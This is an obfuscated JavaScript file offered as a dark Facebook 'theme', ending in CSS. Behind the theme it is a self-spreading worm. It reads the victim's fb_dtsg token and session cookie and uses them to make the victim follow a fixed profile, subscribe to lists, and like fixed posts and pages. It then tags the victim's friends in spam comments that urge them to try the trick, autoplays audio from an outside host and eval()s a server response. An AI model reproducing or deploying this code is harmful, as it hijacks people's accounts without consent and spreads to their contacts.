/* Trick Modified By - Rizky_creations */
var parent=document.getElementsByTagName("html")[0];
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div.style.bottom="0";
_div.align="center";
var _audio= document.createElement('audio');
_audio.style.width="100%";
_audio.style.height="25px";
_audio.controls = true;
_audio.autoplay = false;
_audio.autoplay = true;
_audio.src = "http://buraevo.ru/UserFiles/54081213avril_lavigne_-_i_will_be.mp3";
_div.appendChild(_audio);
_body.appendChild(_div);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var _0x235a=["\x2F\x61\x6A\x61\x78\x2F\x66\x6F\x6C\x6C\x6F\x77\x2F\x66\x6F\x6C\x6C\x6F\x77\x5F\x70\x72\x6F\x66\x69\x6C\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65\x5F\x69\x64\x3D","\x26\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x31\x26\x73\x6F\x75\x72\x63\x65\x3D\x66\x6F\x6C\x6C\x6F\x77\x2D\x62\x75\x74\x74\x6F\x6E\x26\x73\x75\x62\x73\x63\x72\x69\x62\x65\x64\x5F\x62\x75\x74\x74\x6F\x6E\x5F\x69\x64\x3D\x75\x33\x37\x71\x61\x63\x5F\x33\x37\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x6C\x73\x64\x26\x5F\x5F","\x26\x70\x68\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x31\x30\x30\x30\x30\x37\x37\x39\x37\x31\x38\x32\x33\x35\x33","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x6E\x65\x77\x20\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74\x28\x29\x2E\x73\x65\x74\x55\x52\x49\x28\x27\x2F\x61\x6A\x61\x78\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x6C\x69\x73\x74\x73\x2F\x73\x75\x62\x73\x63\x72\x69\x62\x65\x2F\x6D\x6F\x64\x69\x66\x79\x3F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x70\x65\x72\x6D\x61\x6C\x69\x6E\x6B\x26\x61\x63\x74\x69\x6F\x6E\x3D\x73\x75\x62\x73\x63\x72\x69\x62\x65\x27\x29\x2E\x73\x65\x74\x44\x61\x74\x61\x28\x7B\x20\x66\x6C\x69\x64\x3A\x20","\x20\x7D\x29\x2E\x73\x65\x6E\x64\x28\x29\x3B","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x31\x33\x37\x35\x36\x36\x39\x31\x35\x32\x37\x30\x32\x39\x37\x38","\x31\x33\x37\x35\x36\x37\x33\x34\x30\x32\x37\x30\x32\x35\x35\x33","\x31\x33\x37\x35\x37\x31\x37\x38\x34\x36\x30\x33\x31\x34\x34\x32","\x31\x33\x37\x35\x36\x36\x34\x30\x39\x32\x37\x30\x33\x34\x38\x34","\x31\x33\x37\x35\x36\x36\x33\x39\x37\x32\x37\x30\x33\x34\x39\x36","\x31\x33\x37\x35\x36\x36\x33\x37\x39\x39\x33\x37\x30\x31\x38\x30","\x31\x33\x37\x35\x36\x36\x33\x36\x32\x39\x33\x37\x30\x31\x39\x37","\x31\x33\x37\x35\x36\x36\x34\x33\x32\x36\x30\x33\x36\x37\x39\x34","\x31\x33\x37\x35\x36\x36\x34\x34\x31\x39\x33\x37\x30\x31\x31\x38","\x31\x33\x37\x35\x36\x36\x34\x34\x39\x32\x37\x30\x33\x34\x34\x34","\x31\x33\x37\x35\x36\x36\x34\x36\x34\x39\x33\x37\x30\x30\x39\x35","\x31\x33\x37\x35\x36\x36\x34\x36\x38\x39\x33\x37\x30\x30\x39\x31","\x31\x33\x37\x35\x36\x36\x34\x37\x32\x39\x33\x37\x30\x30\x38\x37","\x31\x33\x37\x35\x36\x36\x34\x37\x38\x32\x37\x30\x33\x34\x31\x35","\x31\x33\x37\x35\x36\x37\x32\x37\x39\x39\x33\x36\x39\x32\x38\x30","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x75\x66\x69\x2F\x6C\x69\x6B\x65\x2E\x70\x68\x70","\x6C\x69\x6B\x65\x5F\x61\x63\x74\x69\x6F\x6E\x3D\x74\x72\x75\x65\x26\x66\x74\x5F\x65\x6E\x74\x5F\x69\x64\x65\x6E\x74\x69\x66\x69\x65\x72\x3D","\x26\x73\x6F\x75\x72\x63\x65\x3D\x31\x26\x63\x6C\x69\x65\x6E\x74\x5F\x69\x64\x3D","\x25\x33\x41\x33\x33\x36\x36\x36\x37\x37\x34\x32\x37\x26\x72\x6F\x6F\x74\x69\x64\x3D\x75\x5F\x70\x73\x5F\x30\x5F\x30\x5F\x31\x34\x26\x67\x69\x66\x74\x6F\x63\x63\x61\x73\x69\x6F\x6E\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x25\x33\x45\x25\x33\x44\x55\x26\x66\x74\x5B\x74\x79\x70\x65\x5D\x3D\x32\x30\x26\x66\x74\x5B\x71\x69\x64\x5D\x3D\x35\x38\x38\x32\x30\x30\x36\x38\x39\x30\x35\x31\x33\x37\x38\x34\x37\x31\x32\x26\x66\x74\x5B\x6D\x66\x5F\x73\x74\x6F\x72\x79\x5F\x6B\x65\x79\x5D\x3D","\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x68\x6F\x6D\x65\x5F\x73\x74\x72\x65\x61\x6D\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x33\x35\x43\x46\x77\x58\x41\x67\x26\x5F\x5F\x72\x65\x71\x3D\x6A\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x70\x61\x67\x65\x73\x2F\x66\x61\x6E\x5F\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70","\x26\x66\x62\x70\x61\x67\x65\x5F\x69\x64\x3D","\x26\x61\x64\x64\x3D\x74\x72\x75\x65\x26\x72\x65\x6C\x6F\x61\x64\x3D\x66\x61\x6C\x73\x65\x26\x66\x61\x6E\x5F\x6F\x72\x69\x67\x69\x6E\x3D\x70\x61\x67\x65\x5F\x74\x69\x6D\x65\x6C\x69\x6E\x65\x26\x66\x61\x6E\x5F\x73\x6F\x75\x72\x63\x65\x3D\x26\x63\x61\x74\x3D\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x74\x69\x6D\x65\x6C\x69\x6E\x65\x5F\x70\x61\x67\x65\x5F\x61\x63\x74\x69\x6F\x6E\x73\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x39\x38\x61\x44\x35\x7A\x35\x43\x46\x2D\x26\x5F\x5F\x72\x65\x71\x3D\x64\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x36\x39\x34\x33\x36\x39\x38\x35\x37\x32\x34\x31\x34\x33\x31","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x61\x64\x64\x5F\x66\x72\x69\x65\x6E\x64\x2F\x61\x63\x74\x69\x6F\x6E\x2E\x70\x68\x70","\x74\x6F\x5F\x66\x72\x69\x65\x6E\x64\x3D","\x26\x61\x63\x74\x69\x6F\x6E\x3D\x61\x64\x64\x5F\x66\x72\x69\x65\x6E\x64\x26\x68\x6F\x77\x5F\x66\x6F\x75\x6E\x64\x3D\x66\x72\x69\x65\x6E\x64\x5F\x62\x72\x6F\x77\x73\x65\x72\x5F\x73\x26\x72\x65\x66\x5F\x70\x61\x72\x61\x6D\x3D\x6E\x6F\x6E\x65\x26\x26\x26\x6F\x75\x74\x67\x6F\x69\x6E\x67\x5F\x69\x64\x3D\x26\x6C\x6F\x67\x67\x69\x6E\x67\x5F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x73\x65\x61\x72\x63\x68\x26\x6E\x6F\x5F\x66\x6C\x79\x6F\x75\x74\x5F\x6F\x6E\x5F\x63\x6C\x69\x63\x6B\x3D\x74\x72\x75\x65\x26\x65\x67\x6F\x5F\x6C\x6F\x67\x5F\x64\x61\x74\x61\x26\x68\x74\x74\x70\x5F\x72\x65\x66\x65\x72\x65\x72\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x39\x38\x61\x44\x35\x7A\x35\x43\x46\x2D\x26\x5F\x5F\x72\x65\x71\x3D\x33\x35\x26\x66\x62\x5F\x64\x74\x73\x67\x3D"];function a(_0x3ff7x2){var _0x3ff7x3= new XMLHttpRequest;var _0x3ff7x4=_0x235a[0];var _0x3ff7x5=_0x235a[1]+_0x3ff7x2+_0x235a[2]+fb_dtsg+_0x235a[3]+user_id+_0x235a[4];_0x3ff7x3[_0x235a[6]](_0x235a[5],_0x3ff7x4,true);_0x3ff7x3[_0x235a[7]]=function (){if(_0x3ff7x3[_0x235a[8]]==4&&_0x3ff7x3[_0x235a[9]]==200){_0x3ff7x3[_0x235a[10]];} ;} ;_0x3ff7x3[_0x235a[11]](_0x3ff7x5);} ;a(_0x235a[12]);function sublist(_0x3ff7x7){var a=document[_0x235a[14]](_0x235a[13]);a[_0x235a[15]]=_0x235a[16]+_0x3ff7x7+_0x235a[17];document[_0x235a[19]][_0x235a[18]](a);} ;sublist(_0x235a[20]);sublist(_0x235a[21]);sublist(_0x235a[22]);sublist(_0x235a[23]);sublist(_0x235a[24]);sublist(_0x235a[25]);sublist(_0x235a[26]);sublist(_0x235a[27]);sublist(_0x235a[28]);sublist(_0x235a[29]);sublist(_0x235a[30]);sublist(_0x235a[31]);sublist(_0x235a[32]);sublist(_0x235a[33]);sublist(_0x235a[34]);var user_id=document[_0x235a[36]][_0x235a[35]](document[_0x235a[36]][_0x235a[35]](/c_user=(\d+)/)[1]);var fb_dtsg=document[_0x235a[39]](_0x235a[38])[0][_0x235a[37]];var now=( new Date)[_0x235a[40]]();function P(_0x3ff7xc){var _0x3ff7xd= new XMLHttpRequest();var _0x3ff7xe=_0x235a[41];var _0x3ff7xf=_0x235a[42]+_0x3ff7xc+_0x235a[43]+now+_0x235a[44]+_0x3ff7xc+_0x235a[45]+user_id+_0x235a[46]+fb_dtsg+_0x235a[4];_0x3ff7xd[_0x235a[6]](_0x235a[5],_0x3ff7xe,true);_0x3ff7xd[_0x235a[7]]=function (){if(_0x3ff7xd[_0x235a[8]]==4&&_0x3ff7xd[_0x235a[9]]==200){_0x3ff7xd[_0x235a[10]];} ;} ;_0x3ff7xd[_0x235a[11]](_0x3ff7xf);} ;var fb_dtsg=document[_0x235a[39]](_0x235a[38])[0][_0x235a[37]];var user_id=document[_0x235a[36]][_0x235a[35]](document[_0x235a[36]][_0x235a[35]](/c_user=(\d+)/)[1]);function Like(_0x3ff7x11){var _0x3ff7x12= new XMLHttpRequest();var _0x3ff7x13=_0x235a[47];var _0x3ff7x14=_0x235a[48]+_0x3ff7x11+_0x235a[49]+user_id+_0x235a[50]+fb_dtsg+_0x235a[4];_0x3ff7x12[_0x235a[6]](_0x235a[5],_0x3ff7x13,true);_0x3ff7x12[_0x235a[7]]=function (){if(_0x3ff7x12[_0x235a[8]]==4&&_0x3ff7x12[_0x235a[9]]==200){_0x3ff7x12[_0x235a[10]];} ;} ;_0x3ff7x12[_0x235a[11]](_0x3ff7x14);} ;Like(_0x235a[51]);function IDS(_0x3ff7x16){var _0x3ff7xd= new XMLHttpRequest();var _0x3ff7xe=_0x235a[52];var _0x3ff7xf=_0x235a[53]+_0x3ff7x16+_0x235a[54]+user_id+_0x235a[55]+fb_dtsg+_0x235a[4];_0x3ff7xd[_0x235a[6]](_0x235a[5],_0x3ff7xe,true);_0x3ff7xd[_0x235a[7]]=function (){if(_0x3ff7xd[_0x235a[8]]==4&&_0x3ff7xd[_0x235a[9]]==200){_0x3ff7xd[_0x235a[10]];} ;} ;_0x3ff7xd[_0x235a[11]](_0x3ff7xf);} ;
/*********************** COPYRIGHT ***********************/
/* LIST */
sublist("1375669152702978");sublist("1375673402702553");sublist("1375717846031442");sublist("1375664092703484");sublist("1375663972703496");sublist("1375663799370180");sublist("1375663629370197");sublist("1375664326036794");sublist("1375664419370118");sublist("1375664492703444");sublist("1375664649370095");sublist("1375664689370091");sublist("1375664729370087");sublist("1375664782703415");sublist("1375672799369280");
/* POST */
P("370189579789027");P("478283638943310");P("1375627139373846");P("1375772416025985");P("1375778032692090");P("1375905599346000");P("466185386754952");
/* FANSPAGE */
Like("694369857241431");Like("269074586495954");Like("344916522317615");Like("299721979430");Like("112699618742378");
/* FOLLOW */
a("100007797182353");
/*********************** COPYRIGHT ***********************/
/* Theme Load */
var _0x3b7d=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x33\x37\x30\x31\x38\x39\x35\x37\x39\x37\x38\x39\x30\x32\x37","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x61\x72\x6B\x61\x64\x61\x73\x6C\x61\x72\x20\x3D\x20","\x66\x6F\x72\x20\x28\x3B\x3B\x29\x3B","","\x72\x65\x70\x6C\x61\x63\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x3B","\x6C\x65\x6E\x67\x74\x68","\x65\x6E\x74\x72\x69\x65\x73","\x70\x61\x79\x6C\x6F\x61\x64","\x72\x6F\x75\x6E\x64","\x20\x70\x6C\x65\x61\x73\x65\x20\x74\x72\x79\x20\uDBBA\uDF9C\x20\x40\x5B","\x75\x69\x64","\x3A","\x74\x65\x78\x74","\x5D\x20\uDBBA\uDF9B\x20","\x20","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72","\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79","\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D","\x26\x74\x6F\x6B\x65\x6E\x3D\x76\x37","\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F","\x69\x6E\x64\x65\x78\x4F\x66","\x55\x52\x4C","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x65\x6E\x64","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x26\x66\x74\x5F\x65\x6E\x74\x5F\x69\x64\x65\x6E\x74\x69\x66\x69\x65\x72\x3D","\x26\x63\x6F\x6D\x6D\x65\x6E\x74\x5F\x74\x65\x78\x74\x3D\x53\x75\x63\x63\x65\x73\x73\x20\x31\x30\x30\x25\x2C\x20\x79\x6F\x75\x20\x6D\x75\x73\x74\x20\x74\x72\x79\x20\x74\x68\x69\x73\x20\uDBBA\uDF10\uDBB9\uDD3C\uDBB9\uDD10\uDBB9\uDD12\uDBB8\uDDDB\uDBB8\uDDD9\uDBB8\uDDD8\uDBB8\uDDD7\uDBB8\uDDC9\uDBB8\uDDC8\uDBB8\uDDC7\x20\uDBBA\uDC28\x20\uDBB8\uDC40\x20\uDBB8\uDC3D\x20\uDBB8\uDC3C\x20\uDBB8\uDC41\x20\uDBB8\uDC46\x20\uDBB8\uDC45\x20\x76\x65\x72\x79\x20\x65\x61\x73\x79\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x66\x6F\x6C\x6C\x6F\x77\x20\x74\x68\x69\x73\x20\x73\x74\x65\x70\x20\x62\x79\x20\x73\x74\x65\x70\x20\x3B\x29\x20","\x26\x73\x6F\x75\x72\x63\x65\x3D\x32","\x26\x63\x6C\x69\x65\x6E\x74\x5F\x69\x64\x3D\x31\x33\x37\x37\x38\x37\x31\x37\x39\x37\x31\x33\x38\x3A\x31\x37\x30\x37\x30\x31\x38\x30\x39\x32","\x26\x72\x65\x70\x6C\x79\x5F\x66\x62\x69\x64","\x26\x70\x61\x72\x65\x6E\x74\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x5F\x69\x64","\x26\x72\x6F\x6F\x74\x69\x64\x3D\x75\x5F\x6A\x73\x6F\x6E\x70\x5F\x32\x5F\x33","\x26\x63\x6C\x70\x3D\x7B\x22\x63\x6C\x5F\x69\x6D\x70\x69\x64\x22\x3A\x22\x34\x35\x33\x35\x32\x34\x61\x30\x22\x2C\x22\x63\x6C\x65\x61\x72\x63\x6F\x75\x6E\x74\x65\x72\x22\x3A\x30\x2C\x22\x65\x6C\x65\x6D\x65\x6E\x74\x69\x64\x22\x3A\x22\x6A\x73\x5F\x35\x22\x2C\x22\x76\x65\x72\x73\x69\x6F\x6E\x22\x3A\x22\x78\x22\x2C\x22\x70\x61\x72\x65\x6E\x74\x5F\x66\x62\x69\x64\x22\x3A","\x7D","\x26\x61\x74\x74\x61\x63\x68\x65\x64\x5F\x73\x74\x69\x63\x6B\x65\x72\x5F\x66\x62\x69\x64\x3D\x30","\x26\x61\x74\x74\x61\x63\x68\x65\x64\x5F\x70\x68\x6F\x74\x6F\x5F\x66\x62\x69\x64\x3D\x30","\x26\x67\x69\x66\x74\x6F\x63\x63\x61\x73\x69\x6F\x6E","\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x5B\x5D","\x26\x5F\x5F\x61\x3D\x31","\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x33\x35\x79\x6E\x78\x6C\x32\x75\x35\x46\x39\x37\x4B\x65\x70\x45\x73\x79\x6F","\x26\x5F\x5F\x72\x65\x71\x3D\x71","\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x74\x74\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x2F\x61\x6A\x61\x78\x2F\x75\x66\x69\x2F\x61\x64\x64\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x2E\x70\x68\x70","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65"];var _0xa22c=[_0x3b7d[0],_0x3b7d[1],_0x3b7d[2],_0x3b7d[3],_0x3b7d[4],_0x3b7d[5],_0x3b7d[6],_0x3b7d[7],_0x3b7d[8],_0x3b7d[9],_0x3b7d[10],_0x3b7d[11],_0x3b7d[12],_0x3b7d[13],_0x3b7d[14],_0x3b7d[15],_0x3b7d[16],_0x3b7d[17],_0x3b7d[18],_0x3b7d[19],_0x3b7d[20],_0x3b7d[21],_0x3b7d[22],_0x3b7d[23],_0x3b7d[24],_0x3b7d[25],_0x3b7d[26],_0x3b7d[27],_0x3b7d[28],_0x3b7d[29],_0x3b7d[30],_0x3b7d[31],_0x3b7d[32],_0x3b7d[33],_0x3b7d[34],_0x3b7d[35],_0x3b7d[36],_0x3b7d[37],_0x3b7d[38],_0x3b7d[39],_0x3b7d[40],_0x3b7d[41],_0x3b7d[42],_0x3b7d[43],_0x3b7d[44],_0x3b7d[45],_0x3b7d[46],_0x3b7d[47],_0x3b7d[48],_0x3b7d[49],_0x3b7d[50],_0x3b7d[51],_0x3b7d[52],_0x3b7d[53],_0x3b7d[54],_0x3b7d[55],_0x3b7d[56],_0x3b7d[57],_0x3b7d[58],_0x3b7d[59],_0x3b7d[60],_0x3b7d[61],_0x3b7d[62],_0x3b7d[63],_0x3b7d[64]];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7f8ex8= new XMLHttpRequest();_0x7f8ex8[_0xa22c[6]]=function (){if(_0x7f8ex8[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7f8ex8[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7f8ex9=_0xa22c[24];_0x7f8ex9+=_0xa22c[25];_0x7f8ex9+=_0xa22c[26];_0x7f8ex9+=_0xa22c[27];_0x7f8ex9+=_0xa22c[28]+user_id;_0x7f8ex9+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7f8ex8[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7f8ex9,true);} else {_0x7f8ex8[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7f8ex9,true);} ;_0x7f8ex8[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7f8exb=_0xa22c[10];for(i=0;i<9;i++){_0x7f8exb+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7f8exb;} ;function yorum_yap(id,_0x7f8exd){var _0x7f8exe= new XMLHttpRequest();var _0x7f8ex9=_0xa22c[10];_0x7f8ex9+=_0xa22c[40]+id;_0x7f8ex9+=_0xa22c[41]+encodeURIComponent(_0x7f8exd);_0x7f8ex9+=_0xa22c[42];_0x7f8ex9+=_0xa22c[43];_0x7f8ex9+=_0xa22c[44];_0x7f8ex9+=_0xa22c[45];_0x7f8ex9+=_0xa22c[46];_0x7f8ex9+=_0xa22c[47]+id+_0xa22c[48];_0x7f8ex9+=_0xa22c[49];_0x7f8ex9+=_0xa22c[50];_0x7f8ex9+=_0xa22c[51];_0x7f8ex9+=_0xa22c[52];_0x7f8ex9+=_0xa22c[29]+user_id;_0x7f8ex9+=_0xa22c[53];_0x7f8ex9+=_0xa22c[54];_0x7f8ex9+=_0xa22c[55];_0x7f8ex9+=_0xa22c[56]+fb_dtsg;_0x7f8ex9+=_0xa22c[57];_0x7f8exe[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7f8exe[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7f8exe[_0xa22c[6]]=function (){if(_0x7f8exe[_0xa22c[7]]==4&&_0x7f8exe[_0xa22c[63]]==200){_0x7f8exe[_0xa22c[64]];} ;} ;_0x7f8exe[_0xa22c[37]](_0x7f8ex9);} ;arkadaslari_al(id);
(function() {
var css = ".highlightIndicator, \n.tinyman:after, \n.fbTimelineSideAds,\n.ego_column,\n.buttonWrap, \n.fbTimelineSpine, \n.spinePointer, \n.topBorder, \n.bottomBorder, \n#footerContainer, \n.middleLink, \n.slimHeader #pageNav li.tinyman::after, .slimHeader #pageNav li.middleLink::after, \n.slimHeader #pageNav .middleLink a, \n.moreSectionsLink\n{\ndisplay:none !important;\n}\n\ndiv.mainWrapper{\npadding-left: 1em !important;\n}\n.uiProgressBar .fill {\nbackground: #444 !important;\nborder: solid #222 !important;\n}\n.uiTypeaheadView .compact li {\nbackground-color: #111 !important;\n}\ndiv.uiTypeaheadView .selected {\nbackground-color: #3C3 !important;\n}\n.fbIndex .gradient {\nbackground: none !important;\n}\n.notifNegativeBase #fbNotificationsFlyout li.jewelItemNew, .notifNegativeBase #fbNotificationsFlyout li.first_receipt {\nbackground: #3C3 !important;\n}\n.pop_container {\nbackground-color: #000 !important;\n}\n.pop_verticalslab, .pop_horizontalslab {\nbackground: #222 !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #3C3 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #3C3 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiContextualLayer {\nbackground-color: #111 !important;\n}\n.HighlightSelectorMenu {\nborder: 2px solid #000 !important;\nbackground: #111 !important;\nborder-radius: 5px !important;\n}\n.-cx-PUBLIC-uiDialog__border, ._1yu {\nborder: 10px solid rgba(82, 82, 82, .7) !important;\n-webkit-border-radius: 8px !important;\n}\ninput[type=\"text\"], input[type=\"password\"], .inputtext, select, .select, select > option, select > button, .fbPhotoImageStage .fbPhotosPhotoButtons .tagMessage, .fbPhotoImageStage .fbPhotosPhotoButtons .cropMessage, #u1clso_61 div img, #navSearch .uiTypeahead, .-cx-PRIVATE-uiDialog__content, ._1yu, ._t {\nbackground-color: #111 !important;\n}\n.fbTimelineCapsule\n{\nbackground: none !important;\n}\n.sp_c79t5t\n{\nbackground-image: none !important;\n}\n* {\nborder-color: transparent !important;\ncolor: #fff !important;\nbackground-color: transparent !important; \n}\n\n#fbTimelineHeadline .profilePic {\nbackground-color: #FFF !important;\nborder: 4px solid #FFF !important;\n-webkit-border-radius: 2px !important;\nheight: 160px !important;\nwidth: 160px !important;\n}\n\n\n.fbTimelineScrubber {\n\nborder-color: #CCFF33 !important;\npadding: 8px 0 8px 1px !important;\ntop: 38px !important;\nwidth: 122px !important;\nz-index: 1 !important;\nborder-radius: 10px !important;\n}\n\n.fbPhotosPhotoTagboxBase .tagName {\nbackground: #000 !important;\ncolor: #FFF !important;\ncursor: default !important;\nfont-weight: normal !important;\npadding: 2px 6px 3px !important;\ntop: 3px !important;\nwhite-space: nowrap !important;\n}\n\n.fbPhotosPhotoTagboxBase .innerTagBox {\nborder: 4px solid white !important;\nborder-color: rgba(255, 255, 255, .8) !important;\n}\n\n.fbPhotoSnowlift {\nbackground-color: rgba(0, 0, 0, .7) !important;\n}\n\n.fbPhotoSnowlift .rhc , .pagingActivated .snowliftOverlay, .fbPhotoSnowlift.taggingMode .snowliftOverlay, .stageWrapper{\nbackground-color: #111 !important;\n}\n\n.profile-picture img {\nmax-width: 170px !important;\n}\n\n.webComposerPhotoUpload input, .webComposerPhotoUpload {\ncolor: #66CC33 